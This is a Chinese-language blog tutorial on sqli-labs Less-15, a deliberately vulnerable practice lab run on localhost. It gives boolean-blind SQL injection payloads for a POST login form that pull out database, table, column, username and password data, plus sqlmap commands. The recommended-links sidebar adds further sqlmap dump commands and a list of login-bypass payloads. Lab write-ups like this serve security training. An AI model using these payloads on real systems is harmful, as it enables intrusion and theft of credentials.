sqli-labs-less-15 post布尔盲注+sqlmap爆破

最新推荐文章于 2023-05-09 18:37:47 发布
最新推荐文章于 2023-05-09 18:37:47 发布
阅读量854 收藏 4
点赞数 1
分类专栏: sql注入 文章标签: sql 安全漏洞 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46432288/article/details/109657399
版权

Less-15

方法一:
Post传参,先用burp suite抓包
在这里插入图片描述

判断闭合方式:

uname=’ or 1=1 #&passwd=&submit=Submit 显示登录成功,闭合方式为’’
在这里插入图片描述

uname=’) or 1=1 #&passwd=&submit=Submit 添加符号后没有报错信息,直接返回登录失败,说明这题只有正确或者错误两种返回,可以使用布尔盲注进行注入。
在这里插入图片描述

Substr(a,b,c):从位置b开始截取a字符中的前c个字符

判断当前数据库名长度:

uname=’ or length(database())>0 #&passwd=&submit=Submit

判断数据库名:

先猜解第一个字母:
uname=’ or ascii(substr(database(),1,1))>100 #&passwd=&submit=Submit
第二个字母:
uname=’ or ascii(substr(database(),2,1))>100 #&passwd=&submit=Submit

猜解security库中的表名:

第一个表名的第一个字母:
uname=’ or ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))>100 #&passwd=&submit=Submit

猜解users表中的字段:

第一个字段的第一个字母:
uname=’ or ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),1,1))>100 #&passwd=&submit=Submit

猜解username字段中信息:

第一个信息:
uname=’ or ascii(substr((select username from security.users limit 0,1),1,1))>10 #&passwd=&submit=Submit

猜解password字段中的信息:

uname=’ or ascii(substr((select password from security.users limit 0,1),1,1))>10 #&passwd=&submit=Submit

方法二:

使用sqlmap进行爆破:

使用burp suite抓包之后,得到post传参方法,利用sqlmap进行爆破:
使用命令:
sqlmap.py -u “http://127.0.0.1/sqli-labs-master/Less-15/” --data “uname=1&passwd=&submit=Submit” -f --banner –dbs
开始爆破:

得到banner信息:

在这里插入图片描述

得到数据库:

在这里插入图片描述

并且得到后台数据库的信息已经保存:
在这里插入图片描述

持续更新。。。。。。

yzcn
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs第十一和十二关(post请求爆库)
qq_42266432的博客
08-23 598
第十一关开始,有输入框了,先往里面分别填入两个1看看 页面回显了"尝试登录失败"并且在上面url中并未发现路径后面有提交的参数,说明这不是get请求了,打开hackbar,loadURL发现是以表单方式提交的post请求(刚开始准备使用burp抓包来看请求,结果burp抓取不到本地包就很迷)到这里就可以尝试开始注入了 如上图,uname加上单引号,想要的东西就回显出来了 在将uname变为1’ or 1,上图这个sql报错可以猜出sql的条件目前是uname=‘1’ or 1’ and passwor
sqlmap爆破post数据
a843538946的专栏
12-17 1409
把burpsuite截获的数据包存放到sqlmap本地目录中 python sqlmap.py -r "abc.txt" --batch --dump-all   --dump-all 爆破所有  
sqli-labs/Less-15
m0_71299382的博客
11-18 500
sqli-labs第十五关
Sqlilabs Less15-16
qq_45785324的博客
07-12 303
SqliLabs Less15 Less16
sqlilabs less15~16
TA不懒,但还没有添加简介
07-02 327
sqlilabs less15
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqli-labs-Less-15 时间盲注
feng的博客
09-24 473
sqli-labs的这几题是post注入,之前的几天用万能密码都可以过,但是这题用了各种方式都没回显,因此判断是时间盲注。 关于万能密码,这里引用一下郁离歌大佬的: 1:"or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6:"or 1=1-- 7:'or'a'='a 8:"or"="a'='a 9:'or''=' 10:'or'='or' 11:1 or '1'='1'=1 12:1 or '1'='1' or 1=1 13: 'O
sqli-labs第十五关
yuqnqi的博客
05-09 865
我们采用延迟盲注(时间注入主要用 if(表达式1,表达式2,表达式3) 函数与sleep() 函数配合使用。if函数原理是当表达式1为True时,返回值为表达式二,否则返回表达式三。在尝试之后,联合查询和报错注入方式后无果,我们初步判断为盲注。正确的时候可以直接登录,不正确的时候这里会延时 5 秒。页面无回显,单靠页面无法判断闭合方式,所以得查看源码。本关属于时间注入,基于源码分析,闭合字符是单引号。最后就是猜数据库表和猜数据库了,这里就不在叙述了。看这延迟5秒中,说明猜想数据库8位正确。
sqli-labs通关全解---POST提交方式--less11-16-5
cyynid的博客
01-11 309
POST提交
Sqli-labs之Less-15和Less-16
m0_46315342的博客
06-04 383
                                          &nbs...
sqli-labs靶场实现(五)【POST基于时间与布尔盲注】(less-15(单引号)、less-16(双引号),具体步骤+图文详解)
weixin_46709219的博客
12-20 465
一)POST基于时间与布尔盲注   1)HTTP POST介绍   2)POST基于时间的盲注   3)POST基于布尔盲注   4)sqlmap安全测试 —————————————————————————————————————————————————————— 一)POST基于时间与布尔盲注 1)HTTP POST介绍 前面已经有讲解过GET型的基于时间与布尔盲注,也已经讲解过POST型的错误注入(怎么用burpsuite进行抓包注入),本节就是将前面的两者结合起来变成POST基于时间与布
2020.4.4 sqli-labs--第十五、十六关 ②
DSR446的博客
04-04 433
less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST盲注) 方法一 盲注 - 基于布尔值 - 字符串 怎么输入都没有回显,那就时间延迟吧。 布尔测试payload uname=admin' and 1=1 --+&passwd=admin&submit=Submit //登...
burp爆破mysql_[技巧]使用Burpsuite辅助Sqlmap进行POST注入测试
weixin_28877505的博客
01-26 823
我们在使用Sqlmap进行post型注入时,经常会出现请求遗漏导致注入失败的情况。这里分享一个小技巧,即结合burpsuite来使用sqlmap,用这种方法进行post注入测试会更准确,操作起来也非常容易。1.浏览器打开目标地址http://testasp.vulnweb.com/Login.asp2.配置burp代理(127.0.0.1:8080)以拦截请求3.点击login表单的sub...
SQL注入15】自动化注入技术(基于sqlmap工具和sqli-labs-less1靶场平台)
Fighting_hawk的博客
02-22 4260
1. SQLMAP很自动化,能极大提高工作效率; 2. 掌握SQLMAP的常用命令; 3. 通过SQLMAP自动化运行过程代码,加深对注入原理的理解。
mysql注入爆破数据库,SQL注入之sqlmap爆破sqli-labs-master
weixin_34748612的博客
03-18 774
sqlmap是一款爆破mysql数据的神器。这里我用sqlmap来演示爆破sqli-labs-master的数据库。GET型的sqlmap爆破。1.枚举数据库:Python sqlmay.py -u http://localhost/sqli-labs-master/Less-5/?id=1 –dbs; 2.列出数据库中数据表:python sqlmap.py -u http://localhos...
sqli-labs sqlmap
10-02
sqli-labs是一个用于学习和测试SQL注入漏洞的开源项目。而sqlmap是一个常用的自动化SQL注入工具,可用于检测和利用SQL注入漏洞。在sqli-labs中,可以使用sqlmap来执行各种注入攻击,例如获取数据库名称、获取表、获取字段、获取数据等。 在使用sqlmap时,可以使用不同的参数和payload来执行不同的操作。例如,使用"--dbs"参数可以获取数据库名称,"-D"参数可以指定要操作的数据库,"--tables"参数可以获取表,"-T"参数可以指定要操作的表,"--columns"参数可以获取字段,"--dump"参数可以获取数据等。 以下是一些使用sqlmapsqli-labs中执行注入攻击的示例: 1. 获取数据库名称: python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbs 2. 获取表: python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbs -D mysql --tables 3. 获取字段: python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbs -D mysql -T user --columns 4. 获取数据: python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --dbs -D mysql -T user --dump 请注意,在进行任何安全测试操作之前,应该确保已经取得了合法的授权,并且仅在合法的环境中进行。 以下是一些

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值